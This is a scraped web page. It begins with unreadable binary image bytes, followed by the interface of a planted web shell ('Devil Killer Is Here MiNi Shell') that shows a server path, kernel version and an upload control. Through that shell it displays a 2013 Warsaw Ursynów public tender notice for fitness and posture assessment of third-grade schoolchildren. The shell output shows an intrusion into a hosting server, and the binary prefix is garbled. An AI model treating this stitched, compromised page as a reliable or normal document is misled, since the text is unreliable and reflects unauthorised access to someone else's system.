JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130425/165640-N-2013.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie funkcjonalnej analizy sprawności fizycznej oraz cech postawy ciała dzieci z klas trzecich publicznych szkół podstawowych znajdujących się na terenie Dzielnicy Ursynów oraz opracowanie wytycznych dotyczących podnoszenia sprawności fizycznej oraz korekcji ewentualnych wad postawy osób uczestniczących w projekcie.</b><br>
<b>Numer ogłoszenia: 165640 - 2013; data zamieszczenia: 25.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie funkcjonalnej analizy sprawności fizycznej oraz cech postawy ciała dzieci z klas trzecich publicznych szkół podstawowych znajdujących się na terenie Dzielnicy Ursynów oraz opracowanie wytycznych dotyczących podnoszenia sprawności fizycznej oraz korekcji ewentualnych wad postawy osób uczestniczących w projekcie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest przeprowadzenie funkcjonalnej analizy sprawności fizycznej oraz cech postawy ciała dzieci na podstawie badań i testów 840 uczniów klas trzecich, publicznych szkół podstawowych, z terenu Dzielnicy Ursynów m.st. Warszawy oraz opracowanie raportów zawierających wyniki przeprowadzonych testów i badań, ich analizę oraz wytyczne. Funkcjonalną analizę sprawności fizycznej dzieci oraz cech postawy ciała należy przeprowadzić na terenie poszczególnych placówek oświatowych wskazanych w Wykazie szkół-pkt II.1.4)IV Ogłoszenia zgodnie z harmonogramem ustalonym z dyrektorem szkoły,w miejscu wskazanym przez dyrektora, po uzyskaniu pisemnych zgód rodziców lub opiekunów prawnych.
I.Funkcjonalna analiza sprawności fizycznej oraz cech postawy ciała dzieci klas trzecich.
1.Funkcjonalna analiza sprawności fizycznej ma zawierać:
a)opis uzyskanych rezultatów badań i testów każdego dziecka
b)przedstawienie w formie graficznej wyników testów badania funkcjonalnego, opisanego w Ocenie postawy - badania funkcjonalne pkt II.1.4)2.3 Ogłoszenia.
c)ocenę predyspozycji każdego dziecka do aktywności fizycznej; 
d)zalecenia dotyczące podniesienia sprawności i korekcji ewentualnych wad postawy każdego dziecka.
2.Funkcjonalną analizę sprawności fizycznej należy przeprowadzić w oparciu o:
2.1.Podstawowe dane  o uczniach biorących udział w projekcie:
-imię, nazwisko
-wiek, płeć
-pomiar wysokości i masy ciała - na tej podstawie określenie BMI
-określenie strony dominującej ciała
-określenie stopnia aktywności sportowej.
2.2.Ogólne badanie ortopedyczne:
Ocena:
-ustawienia głowy i poszczególnych odcinków kręgosłupa
-ustawienia barków
-odstawania łopatek
-klatki piersiowej
-kolców biodrowych 
-osi kończyn dolnych
-tyłostopia
-objawu wyprzedzania
-test:palce-podłoga.
2.3.Ocenę postawy-badanie funkcjonalne:
UWAGA:Pomiary muszą odbyć się w sposób bezinwazyjny bez użycia naświetlenia promieniami RTG, w sposób prosty, szybki, ale precyzyjny. 
a.Komputerowe badanie z wykorzystaniem platformy do oceny statycznej oraz dynamicznej pracy stóp (stanie, chodzenie, określone ruchy ciała).
Wymogi względem wykorzystywanych urządzeń przy powyższym badaniu funkcjonalnym
-Urządzenie musi umożliwiać badania rozkładu nacisków stóp na podłoże podczas stania swobodnego, a także w trakcie chodu, biegu i innych czynności ruchowych. Analiza zebranych informacji powinna umożliwiać uzyskanie danych dotyczących jednostkowego i procentowego obciążenia poszczególnych obszarów podeszwowej części stóp, zachowanie się środka ciężkości ciała w bezruchu oraz w ruchu oraz ocenę stóp pod kątem typowych nieprawidłowości
-Urządzenie musi umożliwiać wizualizację rozkładu nacisków w obu stopach, a ocena i analiza danych powinna odbyć się za pomocą komputera.
b.Komputerowe badanie kręgosłupa w dwóch płaszczyznach z wykorzystaniem elektronicznego urządzenia do obiektywnej oceny krzywizn kręgosłupa.
Wymogi względem wykorzystywanych urządzeń przy powyższym badaniu funkcjonalnym
-Elektroniczne urządzenie służące do cyfrowego  pomiaru krzywizn i zakresu ruchomości kręgosłupa w płaszczyźnie czołowej i strzałkowej. 
-Wyniki pomiarów mają być rejestrowane i obrazowane za pomocą komputera w formie danych liczbowych oraz wykresów graficznych.
2.4.Przeprowadzenie testu-ocena jakości ruchów i stanu funkcjonalnego-Test FMS (z ang. Functional Movement Screening)
Przeprowadzenie wystandaryzowanego testu składającego się z siedmiu zadań ruchowych, które dostarczają wiele informacji o stanie funkcjonalnym testowanego dziecka.
2.4.1.Zadania do wykonania w teście FMS:
1)Głęboki przysiad
2)Przeniesienie nogi nad poprzeczką
3)Przysiad w wykroku
4)Ocena ruchomości obręczy barkowej
5)Aktywne uniesienie wyprostowanej nogi
6)Ugięcie ramion w podporze (tzw. pompka)
7)Test stabilności rotacyjnej tułowia.
2.4.2.Zadania ruchowe oceniane są w skali od 0 do 3
0-ból podczas ruchu
1-niezdolny do wykonania wzorca ruchowego
2-wykonanie wzorca ruchowego z elementem kompensacji
3-wykonanie prawidłowe wzorca ruchowego
2.5.Po przeprowadzeniu badań i testów objętych przedmiotem zamówienia Wykonawca, do dnia 31 sierpnia 2013 roku zobowiązany jest sporządzić i przekazać Zamawiającemu:
1)Raport główny-obejmuje zestawienia wyników jakościowych i ilościowych uwzględniających całość badanej populacji oraz z podziałem na placówki szkolne, wraz z analizą i wnioskami płynącymi z uzyskanych wyników-2 egzemplarze  w formie papierowej oraz elektronicznej na płycie CD lub innym nośniku,
2)Raport dla szkoły-obejmuje wyłącznie dane jakościowe i  ilościowe, wraz z analizą i wnioskami płynącymi z uzyskanych wyników do wykorzystania dla potrzeb szkoły, przygotowany dla każdej szkoły indywidualnie-po 2 egzemplarze dotyczące każdej szkoły (w zależności od liczby szkół w których zostaną przeprowadzone badania i testy), forma papierowa, przekazanie również formy elektronicznej na płycie CD lub innym nośniku.
3)Karty indywidualnej oceny ucznia - zebrane wyniki z oceną i rekomendacją dalszego postępowania dla rodziców każdego dziecka  szt. 840 (w zależności od liczby dzieci objętych badaniami i testami), forma papierowa dla rodziców przebadanych dzieci oraz forma elektroniczna na płycie CD lub innym nośniku dla Zamawiającego (bez podawania danych osobowych)
4)Raport merytoryczny składający się z dwóch części, zawierających tabelaryczne, liczbowe i skrócone dane realizacji projektu, w pierwszej części z podziałem na: nazwę i adres szkoły, liczbę uczniów klas trzecich w szkole, liczbę przebadanych uczniów, liczbę uczniów z wykrytą wadą postawy, liczbę uczniów skierowanych do dalszego postępowania medycznego, ocenę testu FMS, określenie rodzaju wad postawy i częstości ich występowania/liczbę zdiagnozowanych uczniów z poszczególnymi wadami postawy oraz określenie wyników BMI-1 egzemplarz  w formie papierowej oraz elektronicznej - na płycie CD lub innym nośniku. Raport  merytoryczny w drugiej części powinien zawierać listę osób uczestniczących w projekcie z podziałem na:nazwisko, imię, numer Pesel, nazwę i numer szkoły i datę przeprowadzenia funkcjonalnej analizy-1 egzemplarz  w formie papierowej oraz elektronicznej-na płycie CD lub innym nośniku. Raport merytoryczny (cześć I i II) powinien być podpisany przez Wykonawcę lub osobę upoważnioną do jego reprezentacji
II.Założenia techniczno-organizacyjne realizacji zamówienia
Usługa realizowana ma być zgodnie z założeniami techniczno-organizacyjnymi:
Badanie, Cecha, Urządzenia, pomoce do realizacji zamówienia
1.Zebranie podstawowych danych-Wzrost ciała(1szt.antropometr-wysokościomierz), Masa ciała(1szt.waga)
2.Badanie ortopedyczne ogólne-Ocena:
-ustawienie głowy i poszczególnych odcinków kręgosłupa
-ustawienie barków
-odstawanie łopatek
-klatki piersiowej
-kolców biodrowych
-osi kończyn dolnych
-tyłostopia
-objawu wyprzedzania
-test:palce-podłoga
(Komputer lub laptop)
3.Ocena jakości ruchów i stanu funkcjonalnego-Test FMS-zespół siedmiu testów służących do przesiewowej diagnostyki stanu funkcjonalnego (3 komplety pomocy do testów FMS:deska, guma, 2 miarki krótkie i 1 długa),
4.Ocena postawy-badania funkcjonalne
Ocena statyczna i dynamiczna stóp-Ocena kształtu stóp, kąt Clarkea, Ocena chodu 1 szt.(urządzenie w postaci platformy połączonej z komputerem,  umożliwiające badanie rozkładu nacisków stóp na podłoże podczas stania swobodnego, a także w trakcie chodu, biegu i innych czynności ruchowych wraz oprogramowaniem, komputer lub laptop)
Ocena funkcjonalna kręgosłupa Pomiar krzywizn i zakresu ruchomości kręgosłupa w płaszczyźnie czołowej i strzałkowej (1szt.-elektroniczne urządzenie do badania kręgosłupa wraz z oprogramowaniem, komputer lub laptop z Bluetooth)
III.Informacje ogólne:
1.Zamawiający zobowiązuje się do pozyskania zgód dyrekcji szkół oraz zapewnienia miejsc na terenie szkół na przeprowadzenie badań i testów. 
2.Wykonawca zobowiązany jest do uzyskania pisemnej zgody rodziców/opiekunów prawnych dzieci przed rozpoczęciem badań i testów dzieci, w zakresie objętym przedmiotem zamówienia.
3.Wykonawca zobowiązany jest ustalić ze szkołami i z Zespołem Sportu i Rekreacji dla Dzielnicy Ursynów m.st. Warszawy harmonogram, uwzględniający szczegółowe terminy  przeprowadzenia badań i testów. Wyżej wymieniony harmonogram w terminie 3 dni od dnia podpisania umowy powinien być dostarczony przedstawicielom Zamawiającego w formie pisemnej. 
4.Do realizacji niniejszego zamówienia Wykonawca zobowiązany jest zapewnić pełną obsługę techniczną i organizacyjną prowadzonych testów i badań. 
5.Testy, badania i analiza wyników powinny być realizowane przez specjalistów posiadających wiedzę i doświadczenie w prowadzeniu badań.
6.Termin realizacji przedmiotu zamówienia:od dnia zawarcia umowy do 31.08.2013 r., z tym, że testy i badania należy przeprowadzić do dnia 14.06.2013 r.(wykonywanie badań i testów od poniedziałku do piątku w godzinach pracy szkół).
7.Przewidywana przez Zamawiającego minimalna ilość zamówienia, która zostanie zlecona w ramach przedmiotowego zamówienia wynosi 80%. Wartość procentowa uzależniona  jest od liczby pisemnych zgód wyrażonych przez rodziców/opiekunów prawnych dzieci objętych badaniami i testami. Zamawiający nie ma wpływu na liczbę zgód i nie ponosi za  to odpowiedzialności.
IV.Wykaz publicznych Szkół Podstawowych na terenie Dzielnicy Ursynów objętych projektem:
L.p., Nr szkoły, Adres szkoły
1.Szkoła Podstawowa nr 16 im.Tony Halika w Warszawie,Ul.Wilczy Dół 4,02-798 Warszawa (22)649-66-02
2.Szkoła Podstawowa nr 81 im.Lucjana Rudnickiego w Warszawie,Ul.Puszczyka 6,02-785 Warszawa(22)643-60-26
3.Szkoła Podstawowa nr 96 im.Ireny Kosmowskiej w Warszawie,Ul.Sarabandy 16/22,02-868 Warszawa (22)644-85-87
4.Szkoła Podstawowa Numer 100 im.Francesco Nullo w Warszawie,Ul.Taneczna 54/58, 02-829 Warszawa (22)643-05-78
5.Szkoła Podstawowa nr 303 im.Fryderyka Chopina w Warszawie,Ul.Koncertowa 8,02-787 Warszawa (22)643-71-23
6.Szkoła Podstawowa nr 310 im.Michała Byliny w Warszawie,Ul.Hawajska 7,02-776 Warszawa (22)641-24-88
7.Szkoła Podstawowa z Oddziałami Integracyjnymi nr 318 w Warszawie im.J.Ch.Andersena w Warszawie, Ul.Teligi 3, 02-777 Warszawa(22)641-52-38
8.Szkoła Podstawowa nr 319 im.Marii Kann w Warszawie,Ul.Związku Walki Młodych 10, 02-786 Warszawa (22)643-45-14
9.Szkoła Podstawowa nr 322 im.Jana Brzechwy w Warszawie,Ul.Dembowskiego 9, 02-784 Warszawa (22)641-71-20
10.Szkoła Podstawowa z Oddziałami Integracyjnymi nr 343 im.Matki Teresy z Kalkuty w Warszawie,Ul.Kopcińskiego 7, 02-777 Warszawa,(22)643-84-54
Szczegółowy opis przedmiotu zamówienia określa także:
1)Załącznik nr 1a do SIWZ-Formularz cenowy;
2)Załącznik nr 6 do SIWZ-Wzór umowy
V.Zamawiający żąda od Wykonawcy wskazania w ofercie części zamówienia, którą zamierza powierzyć Podwykonawcom.
VI.Zamawiający udostępnia w przedmiotowym postępowaniu SIWZ wraz z całą dokumentacją postępowania na stronie internetowej-www.ursynow.pl
VII.Zamawiający nie zamierza w ramach niniejszego postępowania zawrzeć umowy ramowej.
VIII.Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.60.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 2 000,00 złotych  (słownie: dwa tysiące złotych 00/100 groszy).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) co najmniej jedną usługę wykonaną w ramach jednej umowy polegającą min. na przeprowadzeniu testów lub badań lub analizy sprawności fizycznej w ramach której w trakcie faktycznej ilości dni realizacji umowy2 przebadał średnio minimum 30 osób dziennie.

1 Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.
2 Za faktyczną ilość dni Zamawiający rozumie dni w których Wykonawca faktycznie wykonywał usługę tj. np. dni robocze.

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt III.4.1) Ogłoszenia. Z treści załączonego oświadczenia musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu - innego/ych podmiotu/ów, niezależnie od charakteru prawnego łączących go z nim/i stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w pkt III.4.2) Ogłoszenia tj. aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w miejscu zamieszkania osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej - zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
3.1.Oświadczenie wymienione w pkt III. 4.1.) Ogłoszenia w zakresie: art. 22 ust. 1 pkt 1-4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólnie (podpisane przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, tj. uprawnionych ich przedstawicieli lub przez umocowanego Pełnomocnika), potwierdzając iż określone przez Zamawiającego warunki spełniają razem.
3.2.Dokumenty wymienione w pkt III.4.1. Ogłoszenia winien przedłożyć jeden albo więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tak aby potwierdzić łączne spełnianie warunku o którym mowa w pkt III.3.2) Ogłoszenia.
3.3. Oświadczenie wymienione w pkt III.4.2.) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. Zamawiający dopuszcza aby niniejszy dokument został złożony wspólnie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, lecz w takiej sytuacji na niniejszym dokumencie wymagany jest podpis każdego uprawnionego przedstawiciela Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia.
3.4. Dokument wymieniony w pkt III.4.2.) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia.
3.5. Dokument odpowiedni o którym mowa w pkt III.4.4.) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
a)terminu realizacji zamówienia pod warunkiem, że zaszły okoliczności których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:
-siły wyższej, w szczególności takiej jak klęski żywiołowe
-działań osób trzecich uniemożliwiających wykonanie usług, które to działania nie są konsekwencją winy którejkolwiek ze stron
b)Zmiany kadry, tj. osób odpowiedzialnych odpowiednio za: nadzór zamówienia ze strony Wykonawcy, nadzór ze strony Zamawiającego, w szczególności z powodu zdarzeń losowych, tj. śmierć, choroba, ustanie stosunku pracy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:
- osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 333..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2013 godzina 10:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, ZESPÓŁ SPORTU I REKREACJI,POK. NR 551.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





